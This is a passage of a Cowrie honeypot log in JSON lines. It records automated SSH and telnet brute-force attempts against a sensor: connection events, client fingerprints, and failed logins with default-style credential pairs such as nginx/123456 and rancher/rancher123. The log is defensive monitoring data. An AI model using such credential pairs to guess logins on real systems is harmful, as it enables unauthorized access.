ha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:59:01.509249Z","src_ip":"212.227.125.160","session":"50001a25d556"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33592,"dst_ip":"1.2.3.4","dst_port":23,"session":"3df3ebc640c9","protocol":"telnet","message":"New connection: 212.227.125.160:33592 (1.2.3.4:23) [session: 3df3ebc640c9]","sensor":"my-vps","timestamp":"2025-08-31T03:59:01.543298Z"}
{"eventid":"cowrie.login.failed","username":"master","password":"welcome","message":"login attempt [master/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:59:03.770266Z","src_ip":"212.227.125.160","session":"50001a25d556"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:05.480884Z","src_ip":"212.227.125.160","session":"50001a25d556"}
{"eventid":"cowrie.session.closed","duration":13.665314197540283,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:09.482152Z","src_ip":"212.227.125.160","session":"fc3034711bd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33763,"dst_ip":"1.2.3.4","dst_port":23,"session":"c735107ee560","protocol":"telnet","message":"New connection: 212.227.125.160:33763 (1.2.3.4:23) [session: c735107ee560]","sensor":"my-vps","timestamp":"2025-08-31T03:59:10.687643Z"}
{"eventid":"cowrie.session.closed","duration":13.834527730941772,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:11.521683Z","src_ip":"212.227.125.160","session":"fd6e656fdc2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33783,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a8f6a2fe804","protocol":"telnet","message":"New connection: 212.227.125.160:33783 (1.2.3.4:23) [session: 6a8f6a2fe804]","sensor":"my-vps","timestamp":"2025-08-31T03:59:11.721252Z"}
{"eventid":"cowrie.session.closed","duration":"30.0","message":"Connection lost after 30.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:13.217103Z","src_ip":"212.227.125.160","session":"bccdcbd4b0b1"}
{"eventid":"cowrie.session.closed","duration":12.836396932601929,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:14.379608Z","src_ip":"212.227.125.160","session":"3df3ebc640c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33859,"dst_ip":"1.2.3.4","dst_port":23,"session":"f074846cd944","protocol":"telnet","message":"New connection: 212.227.125.160:33859 (1.2.3.4:23) [session: f074846cd944]","sensor":"my-vps","timestamp":"2025-08-31T03:59:14.617224Z"}
{"eventid":"cowrie.session.connect","src_ip":"121.43.208.125","src_port":34632,"dst_ip":"1.2.3.4","dst_port":22,"session":"8967dedc3c6d","protocol":"ssh","message":"New connection: 121.43.208.125:34632 (1.2.3.4:22) [session: 8967dedc3c6d]","sensor":"my-vps","timestamp":"2025-08-31T03:59:21.375033Z"}
{"eventid":"cowrie.session.closed","duration":13.721063375473022,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:24.408634Z","src_ip":"212.227.125.160","session":"c735107ee560"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33988,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6d0b4daeeb4","protocol":"telnet","message":"New connection: 212.227.125.160:33988 (1.2.3.4:23) [session: b6d0b4daeeb4]","sensor":"my-vps","timestamp":"2025-08-31T03:59:24.657179Z"}
{"eventid":"cowrie.session.closed","duration":13.434547185897827,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:25.155731Z","src_ip":"212.227.125.160","session":"6a8f6a2fe804"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34037,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a9322f2677d","protocol":"telnet","message":"New connection: 212.227.125.160:34037 (1.2.3.4:23) [session: 7a9322f2677d]","sensor":"my-vps","timestamp":"2025-08-31T03:59:25.369847Z"}
{"eventid":"cowrie.session.closed","duration":13.86569857597351,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:28.482848Z","src_ip":"212.227.125.160","session":"f074846cd944"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34124,"dst_ip":"1.2.3.4","dst_port":23,"session":"6951395490a4","protocol":"telnet","message":"New connection: 212.227.125.160:34124 (1.2.3.4:23) [session: 6951395490a4]","sensor":"my-vps","timestamp":"2025-08-31T03:59:28.661139Z"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:59:29.319331Z","src_ip":"212.227.235.229","session":"f97b3c8d2b03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46266,"dst_ip":"1.2.3.4","dst_port":22,"session":"7aaccb3fe72c","protocol":"ssh","message":"New connection: 212.227.235.229:46266 (1.2.3.4:22) [session: 7aaccb3fe72c]","sensor":"my-vps","timestamp":"2025-08-31T03:59:30.142983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:59:30.143654Z","src_ip":"212.227.235.229","session":"7aaccb3fe72c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:59:30.460052Z","src_ip":"212.227.235.229","session":"7aaccb3fe72c"}
{"eventid":"cowrie.login.failed","username":"rr","password":"rr","message":"login attempt [rr/rr] failed","sensor":"my-vps","timestamp":"2025-08-31T03:59:32.009305Z","src_ip":"212.227.235.229","session":"7aaccb3fe72c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:33.327307Z","src_ip":"212.227.235.229","session":"7aaccb3fe72c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53630,"dst_ip":"1.2.3.4","dst_port":22,"session":"84ec12565292","protocol":"ssh","message":"New connection: 212.227.235.229:53630 (1.2.3.4:22) [session: 84ec12565292]","sensor":"my-vps","timestamp":"2025-08-31T03:59:34.688786Z"}
{"eventid":"cowrie.session.closed","duration":"68.0","message":"Connection lost after 68.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:34.690128Z","src_ip":"212.227.235.229","session":"f97b3c8d2b03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41576,"dst_ip":"1.2.3.4","dst_port":22,"session":"af5c6b6218cc","protocol":"ssh","message":"New connection: 212.227.235.229:41576 (1.2.3.4:22) [session: af5c6b6218cc]","sensor":"my-vps","timestamp":"2025-08-31T03:59:38.184325Z"}
{"eventid":"cowrie.session.closed","duration":13.149599552154541,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:38.519378Z","src_ip":"212.227.125.160","session":"7a9322f2677d"}
{"eventid":"cowrie.session.closed","duration":13.9299635887146,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:38.587075Z","src_ip":"212.227.125.160","session":"b6d0b4daeeb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34317,"dst_ip":"1.2.3.4","dst_port":23,"session":"3bd23723b026","protocol":"telnet","message":"New connection: 212.227.125.160:34317 (1.2.3.4:23) [session: 3bd23723b026]","sensor":"my-vps","timestamp":"2025-08-31T03:59:38.762432Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34316,"dst_ip":"1.2.3.4","dst_port":23,"session":"4c0581005f92","protocol":"telnet","message":"New connection: 212.227.125.160:34316 (1.2.3.4:23) [session: 4c0581005f92]","sensor":"my-vps","timestamp":"2025-08-31T03:59:38.777079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:59:38.935090Z","src_ip":"212.227.235.229","session":"af5c6b6218cc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:59:38.936235Z","src_ip":"212.227.235.229","session":"af5c6b6218cc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:59:40.575916Z","src_ip":"212.227.235.229","session":"84ec12565292"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:59:40.576662Z","src_ip":"212.227.235.229","session":"84ec12565292"}
{"eventid":"cowrie.session.closed","duration":13.907877445220947,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:42.568947Z","src_ip":"212.227.125.160","session":"6951395490a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34340,"dst_ip":"1.2.3.4","dst_port":23,"session":"7f9a47b6c9e1","protocol":"telnet","message":"New connection: 212.227.125.160:34340 (1.2.3.4:23) [session: 7f9a47b6c9e1]","sensor":"my-vps","timestamp":"2025-08-31T03:59:42.793041Z"}
{"eventid":"cowrie.login.failed","username":"master","password":"abc123","message":"login attempt [master/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:59:44.977195Z","src_ip":"212.227.235.229","session":"af5c6b6218cc"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:46.724487Z","src_ip":"212.227.235.229","session":"af5c6b6218cc"}
{"eventid":"cowrie.session.closed","duration":13.466617822647095,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:52.228940Z","src_ip":"212.227.125.160","session":"3bd23723b026"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34517,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed64a827d21a","protocol":"telnet","message":"New connection: 212.227.125.160:34517 (1.2.3.4:23) [session: ed64a827d21a]","sensor":"my-vps","timestamp":"2025-08-31T03:59:52.434854Z"}
{"eventid":"cowrie.session.closed","duration":13.837021589279175,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:52.614012Z","src_ip":"212.227.125.160","session":"4c0581005f92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34529,"dst_ip":"1.2.3.4","dst_port":23,"session":"a220463af8a4","protocol":"telnet","message":"New connection: 212.227.125.160:34529 (1.2.3.4:23) [session: a220463af8a4]","sensor":"my-vps","timestamp":"2025-08-31T03:59:52.823510Z"}
{"eventid":"cowrie.session.closed","duration":13.482184886932373,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:56.275164Z","src_ip":"212.227.125.160","session":"7f9a47b6c9e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34545,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f1a3e47ce62","protocol":"telnet","message":"New connection: 212.227.125.160:34545 (1.2.3.4:23) [session: 0f1a3e47ce62]","sensor":"my-vps","timestamp":"2025-08-31T03:59:56.477294Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59892,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d89c40ba0f1","protocol":"ssh","message":"New connection: 212.227.125.160:59892 (1.2.3.4:22) [session: 8d89c40ba0f1]","sensor":"my-vps","timestamp":"2025-08-31T03:59:59.655412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:00:00.111538Z","src_ip":"212.227.125.160","session":"8d89c40ba0f1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:00:00.112628Z","src_ip":"212.227.125.160","session":"8d89c40ba0f1"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:00:01.061083Z","src_ip":"212.227.235.229","session":"84ec12565292"}
{"eventid":"cowrie.session.connect","src_ip":"121.43.208.125","src_port":42940,"dst_ip":"1.2.3.4","dst_port":22,"session":"3743870b95d7","protocol":"ssh","message":"New connection: 121.43.208.125:42940 (1.2.3.4:22) [session: 3743870b95d7]","sensor":"my-vps","timestamp":"2025-08-31T04:00:01.080298Z"}
{"eventid":"cowrie.login.failed","username":"master","password":"abc123","message":"login attempt [master/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:00:01.784893Z","src_ip":"212.227.125.160","session":"8d89c40ba0f1"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:03.690954Z","src_ip":"212.227.125.160","session":"8d89c40ba0f1"}
{"eventid":"cowrie.session.closed","duration":13.10881519317627,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:05.543598Z","src_ip":"212.227.125.160","session":"ed64a827d21a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34715,"dst_ip":"1.2.3.4","dst_port":23,"session":"2da5e8fec113","protocol":"telnet","message":"New connection: 212.227.125.160:34715 (1.2.3.4:23) [session: 2da5e8fec113]","sensor":"my-vps","timestamp":"2025-08-31T04:00:05.783951Z"}
{"eventid":"cowrie.session.closed","duration":13.65629768371582,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:06.479739Z","src_ip":"212.227.125.160","session":"a220463af8a4"}
{"eventid":"cowrie.session.closed","duration":"31.9","message":"Connection lost after 31.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:06.631316Z","src_ip":"212.227.235.229","session":"84ec12565292"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34728,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b57c6250eb5","protocol":"telnet","message":"New connection: 212.227.125.160:34728 (1.2.3.4:23) [session: 3b57c6250eb5]","sensor":"my-vps","timestamp":"2025-08-31T04:00:06.730733Z"}
{"eventid":"cowrie.session.closed","duration":14.028825998306274,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:10.506050Z","src_ip":"212.227.125.160","session":"0f1a3e47ce62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34856,"dst_ip":"1.2.3.4","dst_port":23,"session":"cfec7e42dbd7","protocol":"telnet","message":"New connection: 212.227.125.160:34856 (1.2.3.4:23) [session: cfec7e42dbd7]","sensor":"my-vps","timestamp":"2025-08-31T04:00:10.689822Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36308,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ce1446b6a78","protocol":"ssh","message":"New connection: 212.227.125.160:36308 (1.2.3.4:22) [session: 5ce1446b6a78]","sensor":"my-vps","timestamp":"2025-08-31T04:00:14.435275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:00:19.283091Z","src_ip":"212.227.125.160","session":"5ce1446b6a78"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:00:19.284207Z","src_ip":"212.227.125.160","session":"5ce1446b6a78"}
{"eventid":"cowrie.session.closed","duration":13.934327840805054,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:19.718201Z","src_ip":"212.227.125.160","session":"2da5e8fec113"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34943,"dst_ip":"1.2.3.4","dst_port":23,"session":"085539c37c25","protocol":"telnet","message":"New connection: 212.227.125.160:34943 (1.2.3.4:23) [session: 085539c37c25]","sensor":"my-vps","timestamp":"2025-08-31T04:00:19.888468Z"}
{"eventid":"cowrie.session.closed","duration":13.8375825881958,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:20.568230Z","src_ip":"212.227.125.160","session":"3b57c6250eb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34995,"dst_ip":"1.2.3.4","dst_port":23,"session":"b33ff798baa4","protocol":"telnet","message":"New connection: 212.227.125.160:34995 (1.2.3.4:23) [session: b33ff798baa4]","sensor":"my-vps","timestamp":"2025-08-31T04:00:20.854125Z"}
{"eventid":"cowrie.session.connect","src_ip":"116.196.70.63","src_port":42306,"dst_ip":"1.2.3.4","dst_port":22,"session":"126f604cdb4a","protocol":"ssh","message":"New connection: 116.196.70.63:42306 (1.2.3.4:22) [session: 126f604cdb4a]","sensor":"my-vps","timestamp":"2025-08-31T04:00:20.881271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:00:20.882159Z","src_ip":"116.196.70.63","session":"126f604cdb4a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T04:00:21.088975Z","src_ip":"116.196.70.63","session":"126f604cdb4a"}
{"eventid":"cowrie.session.closed","duration":13.475191593170166,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:24.164940Z","src_ip":"212.227.125.160","session":"cfec7e42dbd7"}
